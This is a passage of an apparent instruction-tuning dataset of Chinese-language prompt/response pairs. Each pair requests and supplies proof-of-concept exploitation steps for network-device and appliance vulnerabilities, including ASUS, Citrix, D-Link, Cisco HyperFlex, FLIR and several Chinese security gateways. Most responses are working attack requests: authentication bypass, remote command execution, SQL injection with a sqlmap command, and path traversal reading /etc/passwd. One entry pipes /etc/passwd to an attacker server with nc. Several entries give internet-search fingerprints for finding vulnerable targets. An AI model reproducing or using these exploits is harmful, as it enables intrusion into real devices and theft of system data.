Go-http-client/1.1\n\n{\"loginName\":\"luqaahkf\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞.md"}
    380. 

  380. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华硕 GT-AC2900 身份验证绕过 CVE-2021-32030\n漏洞描述:ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时,容易受到身份验证绕过漏洞的攻击,从而导致对管理员界面的未经授权的访问。 参考链接: - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md\n影响版本:``` ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版) ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产) ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-32030\n【POC利用方法】\n1. ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)\nASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)\n2. GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: 192.168.1.107:8443\nContent-Length: 0\nUser-Agent: asusrouter--\nConnection: close\nReferer: https://192.168.1.107:8443/\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n\nHTTP/1.0 200 OK\nServer: httpd/2.0\nContent-Type: application/json;charset=UTF-8\nConnection: close\n\n{\n\"get_cfg_clientlist\":[{\"alias\":\"24:4B:FE:64:37:10\",\"model_name\":\"GT-AC2900\",\"ui_model_name\":\"GT-AC2900\",\"fwver\":\"3.0.0.4.386_41793-gdb31cdc\",\"newfwver\":\"\",\"ip\":\"192.168.50.1\",\"mac\":\"24:4B:FE:64:37:10\",\"online\":\"1\",\"ap2g\":\"24:4B:FE:64:37:10\",\"ap5g\":\"24:4B:FE:64:37:14\",\"ap5g1\":\"\",\"apdwb\":\"\",\"wired_mac\":[\n...\n...\n}\n3. Connection: close\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/华硕 GT-AC2900 身份验证绕过 CVE-2021-32030.md"}
    381. 

  381. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 综合安防管理平台 env 信息泄漏漏洞\n漏洞描述:HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取环境env等敏感消息进一步攻击\n影响版本:HIKVISION 综合安防管理平台\n网络测绘:``` app=\"HIKVISION-综合安防管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"HIKVISION-综合安防管理平台\"\n2. /artemis-portal/artemis/env\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 综合安防管理平台 env 信息泄漏漏洞.md"}
    382. 

  382. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Citrix 远程命令执行漏洞 CVE-2019-19781\n漏洞描述:Citrix ADC(NetScalers)中的目录穿越错误,这个错误会调用perl脚本,perl脚本用于将XML格式的文件附加到受害计算机,因此产生远程执行代码。\n影响版本:``` Citrix NetScaler ADC and NetScaler Gateway version 10.5 Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 Citrix ADC and Citrix Gateway version 13.0 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-19781\n【POC利用方法】\n1. Citrix NetScaler ADC and NetScaler Gateway version 10.5\nCitrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1\nCitrix ADC and Citrix Gateway version 13.0\n2. POST /vpns/portal/scripts/newbm.pl HTTP/1.1\nHost: target-ip\nConnection: close\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.23.0\nNSC_NONCE: nsroot\nNSC_USER: ../../../netscaler/portal/templates/15ffbdca\nContent-Length: 89\n \nurl=http://example.com&title=15ffbdca&desc=[% template.new('BLOCK' = 'print `whoami`') %]\n3. GET /vpns/portal/15ffbdca.xml HTTP/1.1\nHost: 50.202.211.151\nConnection: close\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.23.0\nNSC_NONCE: nsroot\nNSC_USER: nsroot\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md"}
    383. 

  383. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:rConfig useradmin.inc.php 信息泄露漏洞\n漏洞描述:rConfig useradmin.inc.php 存在信息泄露漏洞,通过访问文件获取用户邮箱信息和登录名\n影响版本:``` rConfig ```\n网络测绘:``` app=\"rConfig\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"rConfig\"\n2. <?php\n/* Includes */\nrequire_once(\"../classes/db2.class.php\");\ninclude_once('../classes/paginator.class.php');\n\n/* Instantiate DB Class */\n$db2 = new db2();\n\n// get timezone for later\n$db2->query(\"SELECT timeZone FROM settings\");\n$result = $db2->resultsetCols();\n$timeZone = $result[0];\ndate_default_timezone_set($timeZone);\n\n/* Get Row count from users where NOT deleted */\n$db2->query('SELECT COUNT(*) AS total FROM users WHERE status = 1');\n$row = $db2->resultsetCols();\n$result[\"total\"] = $row[0];\n/* Instantiate Paginator Class */\n$pages = new Paginator;\n$pages->items_total = $result['total'];\n$pages->mid_range = 7; // Number of pages to display. Must be odd and > 3\n$pages->paginate();\necho $pages->display_pages();\necho \"<span class=\\\"\\\">\" . $pages->display_jump_menu() . $pages->display_items_per_page() . \"</span>\";\n\n/* GET all nodes records from DB */\n$db2->query(\"SELECT id, username, userlevel, email, timestamp FROM users WHERE status = 1 $pages->limit\");\n$resultSelect = $db2->resultset();\n// push rows to $itesm array\n$items = array();\nforeach ($resultSelect as $row) {\n    array_push($items, $row);\n}\n/* Create Multidimensional array for use later */\n$result[\"rows\"] = $items;\n$i = 0; # row counter  to enable alternate row coloring\n?>\n\n<table id=\"userAddTbl\" class=\"tableSimple\">\n    <thead>\n    <th rowspan=\"2\"><input type=\"checkbox\" disabled=\"disabled\"/></th>\n    <th rowspan=\"2\">Username</th>\n    <th rowspan=\"2\">E-mail</th>\n    <th rowspan=\"2\">User Level</th>\n    <th rowspan=\"2\">Last Login</th>\n</thead>\n<tbody>\n    <?php\n    foreach ($result['rows'] as $rows):\n        $id = $rows['id'];\n        /* This bit just updates the class='row' bit with an alternating 1 OR 0 for alternative row coloring */\n        echo '<tr class=\"row' . ($i++ % 2) . '\">';\n        ?>\n    <td align=\"center\"><input type=\"checkbox\" name=\"tablecheckbox\" id=\"<?php echo $id; ?>\"/></td>\n    <td align=\"center\"><strong><?php echo $rows['username'] ?></strong></td>\n    <td align=\"center\"><?php echo $rows['email'] ?></td>\n    <td align=\"center\">\n        <?php\n        // quick check if userlevel =9 user is admin else, user is a User\n        if ($rows['userlevel'] == 9) {\n            $userlevel = \"Admin\";\n        } else {\n            $userlevel = \"User\";\n        }\n        echo $userlevel;\n        ?></td>\n    <td align=\"center\">\n        <?php\n        // quick convert unix TimeStamp to normal times\n        $lastLogin = date('H:i d-m-Y', $rows['timestamp']);\n        echo $lastLogin;\n        ?>\n    </td>\n    </tr>\n<?php endforeach; ?>\n</tbody>\n</table>\n\n<?php\necho $pages->display_pages();\necho \"<div class=\\\"spacer\\\"></div>\";\necho \"<p class=\\\"paginate\\\">Page: $pages->current_page of $pages->num_pages</p>\\n\";\n3. /useradmin.inc.php\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/rConfig useradmin.inc.php 信息泄露漏洞.md"}
    384. 

  384. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DIR-841 命令注入漏洞 CVE-2021-28143\n漏洞描述:D-Link DIR-841 3.03和3.04 存在经过身份验证的命令注入,通过“系统工具”(ping/ping6/traceroute)命令注入,可导致攻击者进行完全控制设备。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2021-28143 - https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-28143\n【POC利用方法】\n1. POST /jsonrpc HTTP/1.1\nHost: IP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nAuthorization: Digest username=\"admin\", realm=\"domain\", nonce=\"4784226\", uri=\"/jsonrpc\", response=\"84799b55020cf2c53e28214e3d60b899\", qop=auth, nc=00000035, cnonce=\"bPzBB3mcvSb51Ijx\"\nContent-Length: 156\nOrigin: IP\nConnection: close\nReferer: http://ip-address:9821/admin/index.html\nCookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>\n\n{\"jsonrpc\":\"2.0\",\"method\":\"write\",\"params\":{\"id\":166,\"data\":{\"host\":\"'127.0.0.1 & sleep 5'\",\"count\":1,\"is_ipv6\":false,\"max_ttl\":30,\"nqueries\":2,\"waittime\":3},\"save\":true},\"id\":757}\n2. POST /jsonrpc HTTP/1.1\nHost: IP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nAuthorization: Digest username=\"admin\", realm=\"domain\", nonce=\"4784226\", uri=\"/jsonrpc\", response=\"84799b55020cf2c53e28214e3d60b899\", qop=auth, nc=00000035, cnonce=\"bPzBB3mcvSb51Ijx\"\nContent-Length: 156\nOrigin: IP\nConnection: close\nReferer: http://ip-address:9821/admin/index.html\nCookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>\n\n{\"jsonrpc\":\"2.0\",\"method\":\"write\",\"params\":{\"id\":166,\"data\":{\"host\":\"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'\",\"count\":1,\"is_ipv6\":false,\"max_ttl\":30,\"nqueries\":2,\"waittime\":3},\"save\":true},\"id\":757}\n3. Connection: close\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DIR-841 命令注入漏洞 CVE-2021-28143.md"}
    385. 

  385. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:电信 网关配置管理系统 login.php SQL注入漏洞\n漏洞描述:电信网关配置管理系统 前台登陆页面用户名参数存在SQL注入漏洞\n影响版本:``` 电信网关配置管理系统 ```\n网络测绘:``` body=\"src=\"img/dl.gif\"\" && title=\"系统登录\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"src=\"img/dl.gif\"\" && title=\"系统登录\"\n2. POST /manager/login.php HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 53\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: PHPSESSID=2lfi6enp5gehalrb92594c80i6\nConnection: close\n\nName=admin&Pass=admin\n3. sqlmap -r sql-1.txt -p Name --risk 3\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/电信 网关配置管理系统 login.php SQL注入漏洞.md"}
    386. 

  386. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:NetMizer 日志管理系统 cmd.php 远程命令执行漏洞\n漏洞描述:NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行\n影响版本:``` NetMizer 日志管理系统 ```\n网络测绘:``` title=\"NetMizer 日志管理系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. NetMizer 日志管理系统\n2. title=\"NetMizer 日志管理系统\"\n3. /data/manage/cmd.php?cmd=id\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/NetMizer 日志管理系统 cmd.php 远程命令执行漏洞.md"}
    387. 

  387. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金山 VGM防毒墙 downFile.php 任意文件读取漏洞\n漏洞描述:金山 VGM防毒墙 downFile.php文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件\n影响版本:``` 金山 VGM防毒墙 ```\n网络测绘:``` \"金山VGM\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. /downFile.php?filename=../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/金山 VGM防毒墙 downFile.php 任意文件读取漏洞.md"}
    388. 

  388. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞\n漏洞描述:网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信\n影响版本:网御 ACM上网行为管理系统\n网络测绘:``` \"scripts/webcommon.js\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"scripts/webcommon.js\"\n2. /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞.md"}
    389. 

  389. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞\n漏洞描述:中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接,攻击者通过漏洞可获取服务器权限\n影响版本:``` 中远麒麟 iAudit堡垒机 ```\n网络测绘:``` cert.subject=\"Baolei\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 中远麒麟 iAudit堡垒机\n2. cert.subject=\"Baolei\"\n3. <?php\ndefine('CAN_RUN', 1);\nrequire_once('include/global.func.php');\nrequire_once('include/db_connect.inc.php');\nif(empty($_GET['clientip'])){\n\techo 'no host';\n\treturn;\n}\nif(empty($_GET['clientport'])){\n\techo 'no port';\n\treturn;\n}\n$cmd = 'sudo perl test.pl '.$_GET['clientip'].' '.$_GET['clientport'];\nexec($cmd, $o, $r);\n $sql = \"SELECT luser FROM sessions WHERE addr='\".$_GET['clientip'].\"' and pid='\".$o[0].\"' order by sid desc limit 1\";\n$rs = mysql_query($sql);\n$row = mysql_fetch_array($rs);\necho $row['luser'];\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md"}
    390. 

  390. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497\n漏洞描述:思科在研究人员Nikita Abramov和Mikhail Klyuchnikov发现的HyperFlex HX数据平台中修复了两个Unauth RCE和一个任意文件上载\n影响版本:``` Cisco HyperFlex HX ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-1497\n【POC利用方法】\n1. Cisco HyperFlex HX\n2. protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n    String action = request.getParameter(\"action\");\n    if (action == null) {\n      String msg = \"Action for the servlet need be specified.\";\n      writeErrorResponse(response, msg);\n      return;\n    }\n    try {\n      String token = request.getParameter(\"token\");\n      StringBuilder cmd = new StringBuilder();\n      cmd.append(\"exec /bin/storfs-asup \");\n      cmd.append(token);\n      String mode = request.getParameter(\"mode\");\n      cmd.append(\"  \");\n      cmd.append(mode);\n      cmd.append(\"  > /dev/null\");\n      logger.info(\"storfs-asup cmd to run : \" + cmd);\n      ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n      logger.info(\"Starting the storfs-asup now: \");\n      long startTime = System.currentTimeMillis();\n      Process p = pb.start();\n      InputStream errStream = p.getErrorStream();\n      String errMsg = FileUtils.readToString(errStream);\n      int exitCode = p.waitFor();\n      long timeTaken = System.currentTimeMillis() - startTime;\n      logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n      errStream.close();\n      OutputStream outStream = p.getOutputStream();\n      outStream.flush();\n      outStream.close();\n      if (exitCode != 0)\n        throw new Exception(errMsg);\n    } catch (IOException ex) {\n      logger.error(\"Failed to generate asup: \" + ex);\n    } catch (Exception ie) {\n      logger.error(\"Failed to run the /bin/storfs-asup command.\");\n    } finally {\n      logger.info(\"Done executing asup command. \");\n    }\n  }\n3. curl -v http://xxx.xxx.xxx.xxx/storfs-asup -d 'action=&token=`id`&mode=`id`'\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497.md"}
    391. 

  391. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网康 NS-ASG安全网关 index.php 远程命令执行漏洞\n漏洞描述:网康 NS-ASG安全网关 index.php文件存在远程命令执行漏洞,攻击者通过构造特殊的请求包可以获取服务器权限\n影响版本:``` 网康 NS-ASG安全网关 ```\n网络测绘:``` title==\"网康 NS-ASG 应用安全网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 网康 NS-ASG安全网关\n2. title==\"网康 NS-ASG 应用安全网关\"\n3. POST /protocol/index.php\n  \njsoncontent={\"protocolType\":\"getsysdatetime\",\"messagecontent\":\"1;id>1.txt;\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网康 NS-ASG安全网关 index.php 远程命令执行漏洞.md"}
    392. 

  392. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:FLIR-AX8 res.php 后台命令执行漏洞\n漏洞描述:FLIR-AX8 res.php 文件存在后台命令执行漏洞,攻击者通过默认口令登录后台后获取服务器权限\n影响版本:``` FLIR-AX8 ```\n网络测绘:``` app=\"FLIR-FLIR-AX8\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"FLIR-FLIR-AX8\"\n2. <?php\n\tif (isset($_POST[\"action\"])) {\n\t\tswitch ($_POST[\"action\"]) {\n\t\t\tcase \"get\":\n\t\t\t\tif(isset($_POST[\"resource\"]))\n\t\t\t\t{\n\t\t\t\t\tswitch ($_POST[\"resource\"]) {\n\t\t\t\t\t\tcase \".rtp.hflip\":\n\t\t\t\t\t\t\tif (!file_exists(\"/FLIR/system/journal.d/horizontal_flip.cfg\")) {\n\t\t\t\t\t\t\t\t$result = \"false\";\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$result = file_get_contents(\"/FLIR/system/journal.d/horizontal_flip.cfg\") === \"1\" ? \"true\" : \"false\";\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase \".rtp.vflip\":\n\t\t\t\t\t\t\tif (!file_exists(\"/FLIR/system/journal.d/vertical_flip.cfg\")) {\n\t\t\t\t\t\t\t\t$result = \"false\";\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$result = file_get_contents(\"/FLIR/system/journal.d/vertical_flip.cfg\") === \"1\" ? \"true\" : \"false\";\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t$result = trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o \".$_POST[\"resource\"]));\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"set\":\n\t\t\t\tif(isset($_POST[\"resource\"]) and isset($_POST[\"value\"])) {\n\t\t\t\t\tswitch ($_POST[\"resource\"]) {\n\t\t\t\t\t\tcase \"rtp.hflip\":\n\t\t\t\t\t\t\tfile_put_contents(\"/FLIR/system/journal.d/horizontal_flip.cfg\", $_POST[\"value\"] === \"true\" ? \"1\" : \"0\");\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase \"rtp.vflip\":\n\t\t\t\t\t\t\tfile_put_contents(\"/FLIR/system/journal.d/vertical_flip.cfg\", $_POST[\"value\"] === \"true\" ? \"1\" : \"0\");\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t$result = trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset \".$_POST[\"resource\"].\" \".$_POST[\"value\"]));;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tbreak;\n\t\t\tcase \"measurement\":\n\t\t\t\tif (isset($_POST[\"type\"]) && isset($_POST[\"id\"])) {\n\t\t\t\t\t$nodeData =  trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.\".$_POST[\"type\"].\".\".$_POST[\"id\"]));\n\t\t\t\t\t$lines = explode(\"\\n\", $nodeData);\n\t\t\t\t\tforeach($lines as $line)\n\t\t\t\t\t{\n\t\t\t\t\t\t$resource = preg_split('/\\s+/', $line);\n\t\t\t\t\t\t$value = trim($resource[1], \"\\\"\");\n\t\t\t\t\t\t$result[$resource[0]] = $value;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"global-parameters\":\n\t\t\t\t$nodeData =  trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams\"));\n\t\t\t\t$lines = explode(\"\\n\", $nodeData);\n\t\t\t\tforeach($lines as $line)\n\t\t\t\t{\n\t\t\t\t\t$resource = preg_split('/\\s+/', $line);\n\t\t\t\t\t$result[$resource[0]] = $resource[1];\n\t\t\t\t}\n\t\t\tcase \"alarm\":\n\t\t\t\tif(isset($_POST[\"id\"]))\n\t\t\t\t{\n\t\t\t\t\t$nodeData = trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.\".$_POST[\"id\"]));\n\t\t\t\t\t$lines = explode(\"\\n\", $nodeData);\n\t\t\t\t\tforeach($lines as $line)\n\t\t\t\t\t{\n\t\t\t\t\t\t$resource = preg_split('/\\s+/', $line);\n\t\t\t\t\t\t$value = trim($resource[1], \"\\\"\");\n\t\t\t\t\t\t$result[$resource[0]] = $value;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"calibrate\":\n\t\t\t\t$result = shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc\");\n\n\t\t\t\tbreak;\n\t\t\tcase \"node\":\n\t\t\t\t$nodes = trim(shell_exec(\"LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls \".$_POST[\"resource\"]));\n\t\t\t\t$result = preg_split(\"/\\s+\\n/\", $nodes);\n\t\t\t\tbreak;\n\t\t}\n\t\techo json_encode($result);\n\t}\n?>\n3. POST /res.php\n\naction=node&resource=;id\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/FLIR-AX8 res.php 后台命令执行漏洞.md"}
    393. 

  393. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MagicFlow 防火墙网关 main.xp 任意文件读取漏洞\n漏洞描述:MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件\n影响版本:``` MagicFlow 防火墙网关 ```\n网络测绘:``` app=\"MSA/1.0\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. MagicFlow 防火墙网关\n2. app=\"MSA/1.0\"\n3. /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/MagicFlow 防火墙网关 main.xp 任意文件读取漏洞.md"}
    394. 

  394. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞\n漏洞描述:Selea OCR-ANPR摄像机 SeleaCamera 存在任意文件读取漏洞,攻击者通过构造特定的Url读取服务器的文件\n影响版本:``` Selea Selea Targa IP OCR-ANPR Camera iZero Selea Selea Targa IP OCR-ANPR Camera Targa 512 Selea Selea Targa IP OCR-ANPR Camera Targa 504 Selea Selea Targa IP OCR-ANPR Camera Targa Semplice Selea Selea Targa IP OCR-ANPR Camera Targa 704 TKM Selea Selea Targa IP OCR-ANPR Camera Targa 805 Selea Selea Targa IP OCR-ANPR Camera Targa 710 INOX Selea Selea Targa IP OCR-ANPR Camera Targa 750 Selea Selea Targa IP OCR-ANPR Camera Targa 704 ILB ```\n网络测绘:``` \"selea_httpd\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Selea Selea Targa IP OCR-ANPR Camera iZero\nSelea Selea Targa IP OCR-ANPR Camera Targa 512\nSelea Selea Targa IP OCR-ANPR Camera Targa 504\nSelea Selea Targa IP OCR-ANPR Camera Targa Semplice\nSelea Selea Targa IP OCR-ANPR Camera Targa 704 TKM\nSelea Selea Targa IP OCR-ANPR Camera Targa 805\nSelea Selea Targa IP OCR-ANPR Camera Targa 710 INOX\nSelea Selea Targa IP OCR-ANPR Camera Targa 750\nSelea Selea Targa IP OCR-ANPR Camera Targa 704 ILB\n2. \"selea_httpd\"\n3. GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1\nHost: \nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nConnection: close\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞.md"}
    395. 

  395. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Huawei DG8045 deviceinfo 信息泄漏漏洞\n漏洞描述:Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台\n影响版本:``` Huawei DG8045 ```\n网络测绘:``` app=\"DG8045-Home-Gateway-DG8045\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Huawei DG8045\n2. app=\"DG8045-Home-Gateway-DG8045\"\n3. /api/system/deviceinfo\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Huawei DG8045 deviceinfo 信息泄漏漏洞.md"}
    396. 

  396. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JumpServer 远程命令执行漏洞\n漏洞描述:JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。 JumpServer 使用Python / Django 进行开发。2021年1月15日,阿里云应急响应中心监控到开源堡垒机JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取敏感信息,或者执行相关操作控制其中所有机器,执行任意命令。\n影响版本:``` JumpServer < v2.6.2 JumpServer < v2.5.4 JumpServer < v2.4.5 JumpServer = v1.5.9 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. JumpServer < v2.6.2\nJumpServer < v2.5.4\nJumpServer < v2.4.5\nJumpServer = v1.5.9\n2. # -*- coding: utf-8 -*-\n# import requests\n# import json\n# data={\"user\":\"4320ce47-e0e0-4b86-adb1-675ca611ea0c\",\"asset\":\"ccb9c6d7-6221-445e-9fcc-b30c95162825\",\"system_user\":\"79655e4e-1741-46af-a793-fff394540a52\"}\n#\n# url_host='http://192.168.1.73:8080'\n#\n# def get_token():\n#     url = 